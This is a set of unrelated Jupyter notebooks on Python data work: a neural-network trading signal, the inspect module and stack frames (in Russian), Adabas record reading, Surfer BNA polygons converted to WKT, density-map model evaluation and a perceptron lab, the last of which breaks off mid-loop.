        if ix + 1 == len(trades) and row[1] == 'buy':
            continue
        if row[1] == 'buy':
            buy += row[2]
        elif row[1] == 'sell':
            sell += row[2]
    return (sell - buy) / buy
profit_eval(prd)
```
# Neural Network
```
import tensorflow as tf
from sklearn.feature_selection import SelectKBest,chi2,f_regression
# Standardise the training features; the same scaler is reused on test data.
std = StandardScaler()
tX = std.fit_transform(trainX)
# NOTE(review): `dataset` is built and shuffled but never consumed --
# model.fit below takes `tX`/`trainY` directly. Confirm before deleting.
dataset = tf.data.Dataset.from_tensor_slices((tX, trainY.values))
dataset = dataset.shuffle(100)
def get_compiled_model():
    """Build and compile a small dense binary classifier (sigmoid output)."""
    model = tf.keras.Sequential([
        # tf.keras.layers.Dense(500, activation='relu'),
        # tf.keras.layers.LayerNormalization(),
        tf.keras.layers.Dense(10, activation='sigmoid'),
        tf.keras.layers.Dense(1,'sigmoid')  # second positional arg is the activation
    ])
    # Nadam with learning rate 0.1 and decay 0.001; binary cross-entropy
    # matches the 0/1 `tr` label.
    model.compile(optimizer=tf.keras.optimizers.Nadam(0.1,decay= 0.001),
                  loss=tf.keras.losses.BinaryCrossentropy(),
                  metrics=['accuracy'])
    return model
model = get_compiled_model()
# Hold out the last 1% of the training rows for validation.
model.fit(x=tX,y=trainY.values, epochs=50,validation_split= 0.01)

ttX = std.transform(testX)  # reuse the scaler fitted on the training data
prd = pd.DataFrame(model.predict(ttX),columns = ['prd'])
# BUG FIX: make_momentum() takes a single list of predictions. The original
# call passed testY.tolist() plus a second (unsupported) argument, which
# raises TypeError -- and would have thresholded the true labels instead of
# the model output. Call it on the predictions, matching the SVM section.
prd['momentum']=make_momentum(prd.prd.tolist())
prd['Date'] = df[df.Date > '2020-06-30'].Date.values
prd['Close'] = testX['Close_GOOGL'].values
prd = prd.sort_values('Date')
prd['signal'] = make_signale(prd.momentum.tolist())

# Plot the close price with buy ('x') / sell ('o') markers.
plt.figure(figsize=(15,10))
plt.plot(prd.Close.values)
for ix,v in enumerate(prd[['Close','signal']].values):
    if v[1] == 'buy':
        buy = plt.plot(ix,v[0],'x',label = 'buy')
    elif v[1] == 'sell':
        plt.plot(ix,v[0],'o',label='sell')
plt.legend(('Close','buy','sell'))
plt.show()
profit_eval(prd)
prd.prd.plot()
```
| github_jupyter |
# Простые способы работы с типами
Несколько встроенных функций:
```
print(callable(lambda: 1))
print(isinstance("abc", str))
print(issubclass(ValueError, Exception))
```
И всякие магические атрибуты (https://docs.python.org/3/library/inspect.html):
<table class="docutils align-default">
<colgroup>
<col style="width: 19%">
<col style="width: 33%">
<col style="width: 47%">
</colgroup>
<thead>
<tr class="row-odd"><th class="head"><p>Type</p></th>
<th class="head"><p>Attribute</p></th>
<th class="head"><p>Description</p></th>
</tr>
</thead>
<tbody>
<tr class="row-even"><td><p>module</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__file__</p></td>
<td><p>filename (missing for
built-in modules)</p></td>
</tr>
<tr class="row-even"><td><p>class</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__name__</p></td>
<td><p>name with which this
class was defined</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__module__</p></td>
<td><p>name of module in which
this class was defined</p></td>
</tr>
<tr class="row-even"><td><p>method</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__name__</p></td>
<td><p>name with which this
method was defined</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__func__</p></td>
<td><p>function object
containing implementation
of method</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__self__</p></td>
<td><p>instance to which this
method is bound, or
<code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__module__</p></td>
<td><p>name of module in which
this method was defined</p></td>
</tr>
<tr class="row-even"><td><p>function</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__name__</p></td>
<td><p>name with which this
function was defined</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__code__</p></td>
<td><p>code object containing
compiled function
<a class="reference internal" href="../glossary.html#term-bytecode"><span class="xref std std-term">bytecode</span></a></p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__defaults__</p></td>
<td><p>tuple of any default
values for positional or
keyword parameters</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__kwdefaults__</p></td>
<td><p>mapping of any default
values for keyword-only
parameters</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__globals__</p></td>
<td><p>global namespace in which
this function was defined</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__annotations__</p></td>
<td><p>mapping of parameters
names to annotations;
<code class="docutils literal notranslate"><span class="pre">"return"</span></code> key is
reserved for return
annotations.</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__module__</p></td>
<td><p>name of module in which
this function was defined</p></td>
</tr>
<tr class="row-odd"><td><p>traceback</p></td>
<td><p>tb_frame</p></td>
<td><p>frame object at this
level</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>tb_lasti</p></td>
<td><p>index of last attempted
instruction in bytecode</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>tb_lineno</p></td>
<td><p>current line number in
Python source code</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>tb_next</p></td>
<td><p>next inner traceback
object (called by this
level)</p></td>
</tr>
<tr class="row-odd"><td><p>frame</p></td>
<td><p>f_back</p></td>
<td><p>next outer frame object
(this frame’s caller)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>f_builtins</p></td>
<td><p>builtins namespace seen
by this frame</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>f_code</p></td>
<td><p>code object being
executed in this frame</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>f_globals</p></td>
<td><p>global namespace seen by
this frame</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>f_lasti</p></td>
<td><p>index of last attempted
instruction in bytecode</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>f_lineno</p></td>
<td><p>current line number in
Python source code</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>f_locals</p></td>
<td><p>local namespace seen by
this frame</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>f_trace</p></td>
<td><p>tracing function for this
frame, or <code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
<tr class="row-odd"><td><p>code</p></td>
<td><p>co_argcount</p></td>
<td><p>number of arguments (not
including keyword only
arguments, * or **
args)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_code</p></td>
<td><p>string of raw compiled
bytecode</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_cellvars</p></td>
<td><p>tuple of names of cell
variables (referenced by
containing scopes)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_consts</p></td>
<td><p>tuple of constants used
in the bytecode</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_filename</p></td>
<td><p>name of file in which
this code object was
created</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_firstlineno</p></td>
<td><p>number of first line in
Python source code</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_flags</p></td>
<td><p>bitmap of <code class="docutils literal notranslate"><span class="pre">CO_*</span></code> flags,
read more <a class="reference internal" href="#inspect-module-co-flags"><span class="std std-ref">here</span></a></p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_lnotab</p></td>
<td><p>encoded mapping of line
numbers to bytecode
indices</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_freevars</p></td>
<td><p>tuple of names of free
variables (referenced via
a function’s closure)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_posonlyargcount</p></td>
<td><p>number of positional only
arguments</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_kwonlyargcount</p></td>
<td><p>number of keyword only
arguments (not including
** arg)</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_name</p></td>
<td><p>name with which this code
object was defined</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_names</p></td>
<td><p>tuple of names of local
variables</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_nlocals</p></td>
<td><p>number of local variables</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>co_stacksize</p></td>
<td><p>virtual machine stack
space required</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>co_varnames</p></td>
<td><p>tuple of names of
arguments and local
variables</p></td>
</tr>
<tr class="row-odd"><td><p>generator</p></td>
<td><p>\__name__</p></td>
<td><p>name</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>gi_frame</p></td>
<td><p>frame</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>gi_running</p></td>
<td><p>is the generator running?</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>gi_code</p></td>
<td><p>code</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>gi_yieldfrom</p></td>
<td><p>object being iterated by
<code class="docutils literal notranslate"><span class="pre">yield</span> <span class="pre">from</span></code>, or
<code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
<tr class="row-odd"><td><p>coroutine</p></td>
<td><p>\__name__</p></td>
<td><p>name</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>cr_await</p></td>
<td><p>object being awaited on,
or <code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>cr_frame</p></td>
<td><p>frame</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>cr_running</p></td>
<td><p>is the coroutine running?</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>cr_code</p></td>
<td><p>code</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>cr_origin</p></td>
<td><p>where coroutine was
created, or <code class="docutils literal notranslate"><span class="pre">None</span></code>. See
<a class="reference internal" href="sys.html#sys.set_coroutine_origin_tracking_depth" title="sys.set_coroutine_origin_tracking_depth"><code class="xref py py-func docutils literal notranslate"><span class="pre">sys.set_coroutine_origin_tracking_depth()</span></code></a></p></td>
</tr>
<tr class="row-even"><td><p>builtin</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__name__</p></td>
<td><p>original name of this
function or method</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__self__</p></td>
<td><p>instance to which a
method is bound, or
<code class="docutils literal notranslate"><span class="pre">None</span></code></p></td>
</tr>
</tbody>
</table>
## Доступ к глобальным и локальным переменным
```
g = 10
def some_function(a=5):
    """Demo: print the local and global namespaces visible inside a function."""
    b = 27  # local variable, so it appears in locals() together with `a`
    print(locals())
    print()
    print(globals())
some_function()
```
# Модуль inspect
Этот модуль позволяет получать информацию об объектах в runtime. Иногда это бывает полезно =). Создадим несколько объектов, на которых рассмотрим возможности inspect: https://www.journaldev.com/19946/python-inspect-module
```
def module_funct(arg1, arg2='default', *args):
    """Module-level demo function for the inspect examples.

    Returns the first argument tripled; the remaining parameters exist only
    to give the signature-inspection demos something to look at.
    """
    tripled = arg1 * 3
    return tripled
class X(object):
    """Base demo class holding a single ``name`` attribute."""

    def __init__(self, name):
        # Remember the name so get_name() can return it later.
        self.name = name

    def get_name(self):
        """Return the name of the instance."""
        return self.name
x_obj = X('sample_instance')
class Y(X):
    """Child of X used to demonstrate method overriding in the inspect demos."""

    # A method that the parent class X does not define.
    def do_something(self):
        """Anything can be done here."""

    def get_name(self):
        """Override of X.get_name that wraps the name in Y(...)."""
        return 'Y(' + self.name + ')'
```
Этот же код содержится в файле sample.py, который лежит в этой же папке. Будем рассматривать этот файл как модуль. С помощью `inspect.getmembers` можем посмотреть, какие объекты содержит этот модуль.
```
import inspect
import sample
from pprint import pprint
for name, data in inspect.getmembers(sample):
if name.startswith('__'):
continue
print(f'{name} : {data!r}')
```
Можем посмотреть только классы:
```
for key, data in inspect.getmembers(sample, inspect.isclass):
print('{} : {!r}'.format(key, data))
```
Или методы в отдельном классе:
```
pprint(inspect.getmembers(sample.X, inspect.isfunction))
```
Обратите внимание, мы увидели именно методы класса, не bound methods объекта! Чтобы посмотреть, что есть внутри объекта, нам нужно его прежде инстанцировать.
```
x = sample.X(name='inspect_getmembers')
pprint(inspect.getmembers(x, inspect.ismethod))
```
Можем получить docstring:
```
print('X.__doc__:')
print(sample.X.__doc__)
print()
print('getdoc(X):')
print(inspect.getdoc(sample.X))
```
Можно даже посмотреть исходный код сущности =)
```
print(inspect.getsource(sample.Y))
print(inspect.getsource(sample.Y.get_name))
```
### Inspect функций:
```
def foo(a, *, b: int, **kwargs):
    pass

# Grab the Signature object and drill into the keyword-only parameter.
sig = inspect.signature(foo)
print(sig)
print(sig.parameters['b'])
print(sig.parameters['b'].annotation)
```
Кроме информации о самой функции, можно посмотреть, с какими аргументами она будет вызвана, если ее вызвать:
```
# NOTE: inspect.getcallargs is soft-deprecated since 3.5 in favor of
# inspect.signature(...).bind, but still works for this demo.
from inspect import getcallargs
def f(a, b=1, *pos, **named):
pass
# Positional args mapped to parameter names: {'a': 1, 'b': 2, 'pos': (3,), 'named': {}}
print(getcallargs(f, 1, 2, 3))
# Unknown keyword args land in **named: {'a': 2, 'b': 1, 'pos': (), 'named': {'x': 4}}
print(getcallargs(f, a=2, x=4))
# Deliberately invalid call: raises TypeError because required arg 'a' is missing.
getcallargs(f)
```
### Inspect окружения:
```
print('getfile', inspect.getfile(sample.module_funct), sep='\t\t')
print('getmodule', inspect.getmodule(sample.module_funct), sep='\t')
print()
print('getsource', inspect.getsource(sample.module_funct), sep='\n')
print('signature', inspect.signature(sample.module_funct), sep='\t')
```
# Стек интерпретатора
## и абсолютно черная магия
Для описания стека исполняемого кода используются два основных понятия:
- __Стек вызовов__ - стек, хранящий информацию для возврата управления из подпрограмм (процедур, функций) в программу (или подпрограмму, при вложенных или рекурсивных вызовах) и/или для возврата в программу из обработчика прерывания (в том числе при переключении задач в многозадачной среде).
- __Стековый кадр (frame)__ - механизм передачи аргументов и выделения временной памяти (в процедурах языков программирования высокого уровня) с использованием системного стека; ячейка памяти в стеке.
В Python предусмотрены специальные объекты, которые хранят эти сущности: Traceback и Frame.
https://habr.com/ru/post/255239/
Traceback мы можем увидеть при выбросе исключения:
```
import requests
requests.get(None)
```
При отладке приложения нас могут интересовать, например, локальные переменные какой-то функции в момент исполнения. Когда мы получаем исключение, получить доступ к последнему фрейму достаточно легко:
```
import sys
tb = sys.last_traceback
tb
tb.tb_frame
tb.tb_frame.f_locals
```
Но каждый раз принудительно бросать исключение для того, чтобы что-то посмотреть, накладно. Нужно как-то по-другому получить ссылку на фрейм.
```
inspect.currentframe()
```
Это текущий фрейм. А что если мы хотим получить предыдущий по стеку вызовов фрейм? Для этого у нас есть метод `inspect.stack()`
```
# Recurse until i reaches 3, then walk the call stack from the innermost frame
# outwards via frame.f_back and show what inspect.stack() returns per level.
def a(i):
if i < 3:
a(i + 1)
else:
frame = inspect.currentframe()
# walk recursively through all previous frames
while frame.f_back:
print("Название предыдущего фрейма:", frame.f_code.co_name)
frame = frame.f_back
print()
# inspect.stack()[0] is the current frame; larger indices are callers.
print(inspect.stack()[0])
print(inspect.stack()[1])
print(inspect.stack()[2])
print(inspect.stack()[3])
def b():
a(1)
b()
```
`inspect.stack()` возвращает стек вызовов вплоть до текущей функции. Через него можно смотреть информацию о предыдущих фреймах. Кстати, лямбды - это, конечно, тоже отдельные фреймы
```
import threading
threading.Thread(target=lambda: print(inspect.stack()[0])).run()
threading.Thread(target=lambda: print(inspect.stack()[1])).run()
threading.Thread(target=lambda: print(inspect.stack()[2])).run()
```
| github_jupyter |
## 1. Setup
```
import sys
sys.path.append('../..')
import config
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
import warnings
from neural_networks.unet import UNet
from neural_networks.net_utils import predict_density_maps_and_get_counts
from utils.data.data_generator import DataGenerator
from utils.evaluation.evaluation import evaluation_results_as_dict
from utils.evaluation.evaluation import evaluation_results_as_df
from utils.input_output.io import load_images_and_density_maps
from utils.input_output.io import read_json, write_json
from utils.input_output.io import load_gt_counts
%matplotlib inline
%load_ext autoreload
%autoreload 2
warnings.filterwarnings('ignore')
```
## 2. Load the dataset
```
params = {
'dim': config.IMG_DIM,
'batch_size': 1,
'patches_per_image': 1,
'density_map_multiplication_factor': config.DENSITY_MAP_MULTIPLICATION_FACTOR,
'shuffle': False,
'data_augmentation': False
}
train_generator = DataGenerator(config.DATASET_PATH, 'train', **params)
val_generator = DataGenerator(config.DATASET_PATH, 'val', **params)
test_generator = DataGenerator(config.DATASET_PATH, 'test', **params)
train_gt_counts = load_gt_counts(config.TRAIN_GT_COUNT_PATH)
val_gt_counts = load_gt_counts(config.VAL_GT_COUNT_PATH)
test_gt_counts = load_gt_counts(config.TEST_GT_COUNT_PATH)
```
### Select the checkpoint file that you want to test/evaluate
```
checkpoint_filenames = sorted(os.listdir(config.CHECKPOINTS_PATH))
print(checkpoint_filenames)
for checkpoint_idx in range(30, 50, 1):
selected_checkpoint_filename = checkpoint_filenames[checkpoint_idx]
print(f'selected checkpoint_filename: {selected_checkpoint_filename}')
epoch = selected_checkpoint_filename.split('.')[1].split('-')[0]
print('epoch:', epoch)
# Set epoch and val loss
CHECKPOINT_FILENAME = f'{config.CHECKPOINTS_PATH}/{selected_checkpoint_filename}'
QUANTITATIVE_RESULTS_PATH = f'./{config.SUB_EXPERIMENT_NAME}/results/quantitative/epoch_{epoch}'
!rm -rf $QUANTITATIVE_RESULTS_PATH
os.makedirs(QUANTITATIVE_RESULTS_PATH)
## 3. Load the best model
model = UNet(pretrained_weights=CHECKPOINT_FILENAME)
train_pred_counts = predict_density_maps_and_get_counts(model, train_generator,
config.DENSITY_MAP_MULTIPLICATION_FACTOR)
val_pred_counts = predict_density_maps_and_get_counts(model, val_generator,
config.DENSITY_MAP_MULTIPLICATION_FACTOR)
test_pred_counts = predict_density_maps_and_get_counts(model, test_generator,
config.DENSITY_MAP_MULTIPLICATION_FACTOR)
## 4. Predict and evaluate
train_results = evaluation_results_as_dict(train_gt_counts, train_pred_counts, 'train')
val_results = evaluation_results_as_dict(val_gt_counts, val_pred_counts, 'val')
test_results = evaluation_results_as_dict(test_gt_counts, test_pred_counts, 'test')
df = evaluation_results_as_df(train_results, val_results, test_results,
config.ARCHITECTURE_NAME,
config.SUB_EXPERIMENT_NAME,
config.DATASET_NAME)
df.to_csv(f'{QUANTITATIVE_RESULTS_PATH}/results.csv', index=True)
```
| github_jupyter |
# Converting Surfer Atlas .BNA (ASCII DAT) file to a Vector Layer
We have an ASCII file from Surfer in the [BNA format](http://surferhelp.goldensoftware.com/subsys/subsys_gsibna_hid_gsibna_filedesc.htm) defining every building ground plan as a polygon by listing its vertices. Hence the entry for a given building is the building number followed by the number of vertices of its boundary and the rooftop elevation (assumed flat), followed by a list of the (X,Y) coordinates of each one of the vertices of its boundary. As an example the entry for building number 105 is given below:
The sequence means: Building number 105 is a polygon with 6 vertices and its rooftop elevation is 54.69 m (MSL). The (X,Y) co-ordinates of the given 6 vertices follow in the four next lines.
```
105 6 54.69
1651.562500 4787.500000
1652.125000 4785.000000
1649.062500 4787.000000
1650.750000 4789.500000
1653.812500 4787.500000
1652.125000 4785.000000
106 6 58.98
1555.875000 4755.500000
1558.000000 4753.000000
1553.187500 4753.500000
1553.687500 4757.500000
1558.500000 4757.000000
1558.000000 4753.000000
107 8 62.32
1537.062500 4741.500000
1532.062500 4737.000000
1532.062500 4744.500000
1539.625000 4744.500000
1539.437500 4742.000000
1542.062500 4742.000000
1541.875000 4737.000000
1532.062500 4737.000000
```
We can create a CSV with the polygon geometry stored as text in WKT format. QGIS can read this format easily and display the data.
```
import csv

# Paths for the Surfer BNA-style input and the WKT/CSV output.
# (Renamed from `input`/`output` to avoid shadowing the built-ins.)
input_path = 'Buildings.dat'
output_path = 'Buildings.csv'

data = []
with open(input_path, 'r') as f:
    for line in f:
        # Header line of each record: building id, vertex count, rooftop elevation.
        fid, numvertices, elev = line.split()
        coordinates = []
        # Read the next `numvertices` lines, each holding one "X Y" pair.
        # (The original reused `x` as both the loop index and the coordinate.)
        for _ in range(int(numvertices)):
            x, y = f.readline().split()
            coordinates.append('{} {}'.format(x, y))
        # Discard the first coordinate, which is the centroid.
        wkt = 'POLYGON (({}))'.format(','.join(coordinates[1:]))
        data.append({'fid': int(fid), 'elev': float(elev), 'wkt': wkt})

# newline='' is required for the csv module; without it, Windows output
# gets an extra blank line after every row.
with open(output_path, 'w', newline='') as csvfile:
    fieldnames = ['fid', 'elev', 'wkt']
    writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
    writer.writeheader()
    for row in data:
        writer.writerow(row)
```
The result is a CSV file that looks like this
```
fid,elev,wkt
2,127.69,"POLYGON ((627.187500 7781.000000,626.125000 7785.000000,629.062500 7786.000000,630.125000 7782.000000,627.187500 7781.000000))"
3,164.42,"POLYGON ((824.125000 7675.500000,822.687500 7679.000000,826.000000 7680.500000,827.437500 7677.000000,824.125000 7675.500000))"
4,171.19,"POLYGON ((840.125000 7640.500000,836.812500 7652.000000,842.937500 7654.000000,846.250000 7642.500000,840.125000 7640.500000))"
```
The resulting CSV can be imported using the *Delimited Text* tab in the QGIS Data Source Manager using **WKT** field as *Geometry field*

The point layers loads in QGIS. Since the data also has an `elev` attribute, we can style it using the **2.5D** renderer in QGIS.

| github_jupyter |
```
import json
from adabas.api import *
from adabas.datamap import *
from datetime import date
def mask_date(data, mask='%d-%m-%Y'):
    """Format an Adabas natural-date value as a date string.

    The stored value is 364 days ahead of Python's proleptic Gregorian
    ordinal (per the original conversion), so subtract 364 before
    converting with date.fromordinal.

    data: the stored day number (int, or a numeric string).
    mask: strftime format for the result; defaults to '%d-%m-%Y'.
    """
    # PEP 8 (E731): a def is preferred over assigning a lambda to a name.
    return date.fromordinal(int(data) - 364).strftime(mask)
# Elementary field of a periodic group, or a multiple-value elementary field:
# reads all occurrences for one ISN and renders them as the JSON fragment
# '"long_name": [v1, v2, ...]'.  Python 2 only (uses `except E, (..)` syntax,
# str.encode('hex'), and statement-form exec); relies on module-global
# Adabas session `a`.
def get_periodic(isn = 0 # ISN to look up
,gsn = '' # group short name or multiple elementary field - FDT
,esn = '' # elementary short name - FDT
,lgn = '' # elementary long-name - DDM
,lsn = 0 # elementary field length - DDM
,upk = '' # unpack for packed columns: '' or True
,scl = '' # scale or '' - DDM
,Int = '' # True for numeric fields
):
ret = ''
try:
upk = ',U' if upk else ''
Str = '"'
a.cb.isn=isn
# Numeric fields are rendered unquoted via int(); a scale factor becomes
# a multiplication by .1 / .01 / ... depending on scl.
if scl or Int:
Int = 'int('
Str = ''
if scl:
scl = ') * .{0:>0{1}}'.format('1', scl)
else:
scl = ')'
# First read the occurrence counter field (<gsn>C) to learn how many
# occurrences the record holds.
a.fb.value='{}C,002,B.'.format(gsn)
a.get(isn=a.cb.isn)
if a.rb.value:
occ=int(a.rb.value.encode('hex') ) # count occurs group
# Build a Datamap with one String slot per occurrence, then re-read the
# record asking for occurrences 1..occ of the elementary field.
exec ("row = Datamap('Rows', {})".format("String('{lg}{}', {l})," * occ).format(lg=lgn, *range(1,occ+1), l=lsn))
row.buffer = a.rb
a.fb.value='{}1-{},{}{}.'.format(esn, occ, lsn, upk)
a.get(isn=a.cb.isn)
# Assemble the JSON fragment from the mapped occurrence values.
ret = eval("""'"{}": [{}]'.format({})""".format( lgn, (Str+'{}'+Str+', ') * occ, ('{i}row.{ln}{}{sc}, '* occ).format(i=Int,ln=lgn,sc=scl,*range(1,occ+1))))
# ret = ret[:-3] + ']'
ret = ret.replace(', ]', ']')
except DatabaseError, (error,apa):
return error.split(':')[1]
return ret
# Multiple-value field inside a periodic group: for each group occurrence,
# reads all values of the multiple field and renders a JSON fragment
# '"long_name": [[..], [..], ...]'.  Python 2 only; uses module-global
# Adabas session `a`, same conventions as get_periodic above.
def get_per_mult(isn = 0 # ISN to look up
,gsn = '' # group short name - FDT
,esn = '' # elementary short name - FDT
,lgn = '' # elementary long-name - DDM
,lsn = 0 # elementary field length - DDM
,upk = '' # unpack for packed columns: '' or True
,scl = '' # scale or '' - DDM
,Int = '' # True for numeric fields
):
ret = ''
try:
upk = ',U' if upk else ''
Str = '"'
a.cb.isn=isn
# Numeric rendering setup, identical to get_periodic.
if scl or Int:
Int = 'int('
Str = ''
if scl:
scl = ') * .{0:>0{1}}'.format('1', scl)
else:
scl = ')'
lst = '['
# Read the group occurrence counter (<gsn>C) first.
a.fb.value='{}C,002,B.'.format(gsn)
a.get(isn=a.cb.isn)
if a.rb.value:
gocc=int(a.rb.value.encode('hex') ) # count occurs group
# For each group occurrence, read that occurrence's own value counter
# (<esn><o>C) and then its 1..occ values.
for o in range(1,gocc+1):
a.fb.value='{}{}C,002,B.'.format(esn,o)
a.get(isn=a.cb.isn)
if a.rb.value:
occ=int(a.rb.value.encode('hex') ) # count occurs elementar
exec ("row = Datamap('Rows', {})".format("String('{lg}{}', {l})," * occ).format(lg=lgn, *range(1,occ+1), l=lsn))
row.buffer = a.rb
a.fb.value='{}{}(1-{}),{}{}.'.format(esn, o, occ, lsn, upk)
a.get(isn=a.cb.isn)
ret = eval("""'[{}]'.format({})""".format((Str+'{}'+Str+', ') * occ, ('{i}row.{ln}{}{sc}, '* occ).format(i=Int,ln=lgn,sc=scl,*range(1,occ+1))))
lst += '{}, '.format(ret)
else:
break
except DatabaseError, (error,apa):
return error.split(':')[1]
return '"{}": {}]'.format(lgn, lst).replace(', ]', ']')
# Target database/file and the read window for this demo.
DBID=12;FNR=11
STARTISN=282
RCOUNT=5
# Datamap describing the fixed-length layout of the record buffer; the
# trailing comments give the Adabas FDT short names for each field.
row=Datamap('rows',
String('personnel_id', 8), # aa 1
String('first_name', 20), # ac 2
String('middle_name', 20), # ad 3
String('name', 20), # ae 4
String('birth', 6), # ah 5
String('country', 3), # al 6
String('area_code', 6), # an 7
String('phone', 15), # am 8
String('dept', 6), # ao 9
String('job_title', 25)) # ap 10
lines=''
extraline=''
alter=False
# c1: session used for the sequential read; the format buffer lists the
# fields in the same order as the Datamap above.
c1=Adabas(rbl=256,fbl=64,sbl=32,vbl=128,ibl=0)
c1.cb.dbid=DBID
c1.cb.fnr=FNR
c1.cb.cid='1010'
c1.fb.value='AA,AC,AD,AE,AH,6,U,AL,AN,AM,AO,AP.'
# a: second session, used internally by get_periodic()/get_per_mult().
a=Adabas(rbl=256,fbl=64,sbl=32,vbl=128,ibl=0)
a.cb.dbid=DBID
a.cb.fnr=FNR
c1.cb.isn=STARTISN
# use emp Datamap on record buffer
row.buffer=c1.rb
row.offset=0
count=0
try:
for count in range(RCOUNT):
c1.readByIsn(getnext=1)
# Render each record as one JSON object per text line, pulling the
# periodic-group fields via the helper functions defined above.
lines += """{}"{}": {}, "{}": "{}", "{}": "{}", "{}": "{}","""\
""""{}": "{}", "{}": "{}", "{}": "{}","""\
""""{}": "{}", "{}": "{}", "{}": "{}","""\
""""{}": "{}", {}, {}{}\n""".format("{"
,'isn' , c1.cb.isn
,'personnel_id', row.personnel_id
,'first_name' , row.first_name
,'middle_name' , row.middle_name
,'name' , row.name
,'birth' , mask_date(row.birth)
,'country' , row.country
,'area_code' , row.area_code
,'phone' , row.phone
,'dept' , row.dept
,'job_title' , row.job_title
,get_periodic(isn=c1.cb.isn, gsn='AQ', esn='AR', lgn='curr_code', lsn = 3)
,get_per_mult(isn=c1.cb.isn, gsn='AQ', esn='AT', lgn='bonus', lsn=9, upk=True, Int=True)
,"}")
lines+= 'Sequential Read by ISN returned '+str(count+1)+' record(s).'
except DataEnd:
extraline+= 'Sequential Read by ISN returned '+str(count)+' record(s).'
pass
except DatabaseError, (line, apa):
extraline+='Database Error:'+line
# Split the accumulated text into lines and parse one back into a dict to
# prove the generated JSON is well-formed.
line = lines.splitlines()
line[:5]
parsed = json.loads(line[1].decode('utf-8'))
parsed
parsed['bonus']
```
| github_jupyter |
```
import numpy as np
```
#### In this lab, we will implement the perceptron algorithm for a single layer.

```
# Let's implement the algorithm on the AND logic function
a = np.array([[0,0,0],[0,1,0],[1,0,0],[1,1,1]]) # AND logic table
a
# This is the input
inputs = a[:,:2]
inputs
# and this the target
targets = a[:,2:]
targets
# set up the network size
# We need to know the shape of the weights matrix
# it is determined by the number of features in the input samples
# and the number of outputs in the samples
nIn = np.shape(inputs)[1]
nOut = np.shape(targets)[1]
nIn, nOut
# Initialise the weights to small (positive and negative) random numbers
# here we add one row to the weights matrix for the bias
weights = np.random.rand(nIn+1,nOut)*0.1-0.05
weights.shape
# Adding the bias to the inputs samples
nData = np.shape(inputs)[0] # number of samples
inputs = np.concatenate((inputs,-np.ones((nData,1))),axis=1)
inputs
# training loop
eta = 0.25 # the learning rate
nIterations = 10
for n in range(nIterations):
# Compute activations
activations = np.dot(inputs, weights)
# Threshold the activations
